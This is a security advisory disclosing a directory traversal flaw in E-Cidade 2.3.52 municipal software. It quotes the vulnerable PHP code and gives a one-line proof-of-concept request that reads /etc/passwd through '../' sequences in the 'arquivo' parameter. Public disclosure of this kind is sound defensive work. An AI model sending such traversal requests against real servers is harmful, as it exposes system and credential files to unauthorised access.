E-Cidade 2.3.52 Directory Traversal

Published
Credit
Risk
2016.08.28
vesp3r
Medium
CWE
CVE
Local
Remote
CWE-22
N/A
No
Yes

E-cidade Directory Traversal
Vendor: DBSeller (www.dbseller.com.br)
Product: E-cidade - Software Publico de Gestao Municipal
Vulnerability discovered by vesp3r - vesp3r7c3@gmail.com


Product Description
--------------------

Intended to computerize the management of Brazilian Municipalities.This includes computerized integration
between municipal entities: City Hall, Town Hall, Local Government, Foundations and others.
The economy of resources is only one of the advantages in the adoption of e-cidade and the freedom of choice
of suppliers and ensuring continuity of the system, once supported by the Ministry of Planning.

Modules:

- HUMAN RESOURCES MANAGEMENT
- GEOPROCESSING
- HEALTH MANAGEMENT EDUCATION MANAGEMENT
- BUSINESS INTELIGENCE
- FINANCIAL MANAGEMENT
- TAX MANAGEMENT
- ASSET MANAGEMENT

Advisory Timeline
-----------------

No vendor response


Vulnerable version:
-------------------

2.3.52 and prior

Vulnerability
-------------

The vulnerability exists within 'mostrarelatorio.php' file of the package:
the 'arquivo' variable is requested via GET method. It is passed as a variable to another variable called 'arq'.
This variable incorporates a call to the file() function.

/fpdf151/mostrarelatorio.php:
-----------------------------

[Snip...]


if(!file_exists("/tmp/".$arquivo)) {
echo "<script>
alert('Codigo nao Encontrado.');
window.close();
</script>";
exit;
}

[Snip...]

$pdf=new PDF();
$pdf->Open();
$pdf->AliasNbPages();
$pdf->AddPage();
$arq = file("/tmp/".$arquivo);


[Snip...]



Proof of Concept
---------------

GET /e-cidade/fpdf151/mostrarelatorio.php?arquivo=./../../../../../../etc/passwd HTTP/1.1


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com